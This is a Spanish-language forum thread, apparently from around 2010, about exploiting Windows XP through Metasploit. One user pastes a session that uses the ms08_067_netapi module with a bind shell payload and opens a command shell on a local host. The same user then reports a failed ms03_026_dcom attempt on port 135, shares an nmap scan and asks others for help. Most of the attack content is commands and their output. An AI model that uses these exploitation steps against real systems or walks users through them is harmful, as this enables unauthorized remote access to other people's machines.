Metasploit --- Explotando Vulnerabilidad en Puerto 135 (ms03_026_dcom)

[šØrτĦacK]

Hola amigos este es un video donde muestro la explotacion de una vulnerabilidad encontrada en puerto 135 en Windows espero les guste el video y les sea de gran ayuda.

Gracias.

[*dudux]

a ver consigo explotar la vulnerabilidad en el port 445

msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.43
RHOST => 192.168.1.43
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:Spanish[*] Selected Target: Windows XP SP3 Spanish (NX)[*] Attempting to trigger the vulnerability...[*] Command shell session 1 opened (192.168.1.34:42762 -> 192.168.1.43:4444) at 2010-08-16 14:10:20 +0200

Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd..

pero sin encambio no hay manera de entrar por el puerto 135,el ordenador es un xp pelao

msf exploit(ms03_026_dcom) > exploit

[-] Handler failed to bind to 192.168.1.34:4444[*] Started reverse handler on 0.0.0.0:4444
[-] Exploit exception: The host (192.168.1.43:135) was unreachable.[*] Exploit completed, but no session was created.

nmap me da lo siguiente

Interesting ports on 192.168.1.43:
Not shown: 997 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:xxxxxxx (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop

any help?

[Gusan0r]

Usas el mismo payload?

[gazu23]

Debe ser virgen el sistema, y servira en Windows Vista